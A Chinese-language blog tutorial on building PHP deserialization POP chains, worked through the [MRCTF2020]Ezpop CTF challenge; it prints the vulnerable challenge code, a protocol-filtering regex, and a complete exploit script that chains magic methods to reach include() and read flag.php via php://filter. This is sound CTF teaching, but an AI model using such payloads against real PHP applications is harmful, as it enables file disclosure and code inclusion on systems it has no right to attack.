php反序列化之pop链构造
前言
隨著對反序列化學(xué)習(xí)的不斷深入,我們來學(xué)習(xí)一下pop鏈的構(gòu)造。這個pop鏈對于我這種小白來說還是比較難理解的,再次寫下這篇文章總結(jié)一下,加深自己對構(gòu)造pop鏈的理解。同時也是提供想要入坑的小伙伴們一些理解。
pop鏈構(gòu)造
一般的反序列化題目,存在漏洞或者能注入惡意代碼的地方在魔術(shù)方法中,我們可以通過自動調(diào)用魔術(shù)方法來達到攻擊效果。但是當(dāng)注入點存在普通的類方法中,通過前面自動調(diào)用的方法就失效了,所以我們需要找到普通類與魔術(shù)方法之間的聯(lián)系,理出一種邏輯思路,通過這種邏輯思路來構(gòu)造一條pop鏈,從而達到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術(shù)方法。
pop鏈簡介
它是一種面向?qū)傩跃幊?#xff0c;常用于構(gòu)造調(diào)用鏈的方法。在題目中的代碼里找到一系列能調(diào)用的指令,并將這些指令整合成一條有邏輯的能達到惡意攻擊效果的代碼,就是pop鏈(個人理解,歡迎師傅們提出意見)在構(gòu)造pop鏈中,魔術(shù)方法必不可少。下面將通過一個例題來說pop鏈是怎么構(gòu)造的,以及具體構(gòu)造的思路。
[MRCTF2020]Ezpop1
上題目代碼:
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier {protected $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);} }class Show{public $source;public $str;public function __construct($file='index.php'){$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){return $this->str->source;}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {echo "hacker";$this->source = "index.php";}} }class Test{public $p;public function __construct(){$this->p = array();}public function __get($key){$function = $this->p;return $function();} }if(isset($_GET['pop'])){@unserialize($_GET['pop']); } else{$a=new Show;highlight_file(__FILE__); }構(gòu)造思路
在構(gòu)造調(diào)用鏈時,先找到調(diào)用鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方,而尾部一般都是可以執(zhí)行惡意代碼的地方。審計這個題的代碼,頭是用get方式對pop傳參,而尾部是include包含函數(shù)。到這里,我們應(yīng)該都知道是要用php偽協(xié)議讀取flag文件的源碼。既然頭和尾都找到了,也知道了攻擊方法。那么接下來找到題目中的魔術(shù)方法。
__invoke() 當(dāng)一個類被當(dāng)作函數(shù)執(zhí)行時調(diào)用此方法。__construct 在創(chuàng)建對象時調(diào)用此方法__toString() 在一個類被當(dāng)作字符串處理時調(diào)用此方法__wakeup() 當(dāng)反序列化恢復(fù)成對象時調(diào)用此方法__get() 當(dāng)讀取不可訪問或不存在的屬性的值會被調(diào)用題中一共有這五種魔術(shù)方法。接著找出普通類與魔術(shù)方法之間的聯(lián)系。
不難看出wakeup函數(shù)中有個preg_match函數(shù),用于查找source中敏感的字符串,我們可以從這里開頭,將source賦予一個show類,那么會自動觸發(fā)toString函數(shù),那么現(xiàn)在就要在tostring方法中延申鏈子,那么我們可以在totring方法中$this->str賦予test類,在test類讀取source變量,(因為test類中沒有source屬性,則是訪問了不可訪問的屬性)則會自動調(diào)用get魔術(shù)方法。可以發(fā)現(xiàn)get方法中有個函數(shù)調(diào)用,則我們可以將$this->p賦予Modifier類,會自動調(diào)用invoke方法,從而執(zhí)行我們寫入的php偽協(xié)議(將Modifer類中的var屬性賦值為我們的惡意代碼)
至此,我們構(gòu)造pop鏈。
pop鏈講解
<?php class Modifier {protected $var='php://filter/read=convert.base64-encode/resource=flag.php'; } class Show{public $source;public $str;function _construct(){$this->source=$file;} } class Test{public $p; } $a = new show(); $b = new show(); $c = new test(); $d = new Modifier(); $a->source=$b; $b->str=$c; $c->p= $d; echo urlencode(serialize($a)); ?>先把用到的類寫出來,形成一個框架,再表明類中的變量。分別將用到的類進行實例化,這里為什么要new 兩次show(看代碼應(yīng)該能看懂,第一次是實例化show類,第二次是將第一次實例化后的show類中的source=第二次實例化的show)
在我們進行序列化的時候盡量用url編碼一下(在這個題中有protected修飾的屬性,會有不可見字符)
總結(jié)
構(gòu)造pop鏈是一個邏輯性比較強的題目,我們需要不斷的刷題,總結(jié)經(jīng)驗和提高自己的邏輯性。
希望我的文章能解答一些小師傅的疑惑。
總結(jié)
以上是生活随笔為你收集整理的php反序列化之pop链构造的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CK-GL16-AB传感器|读卡器在工业
- 下一篇: 简易背单词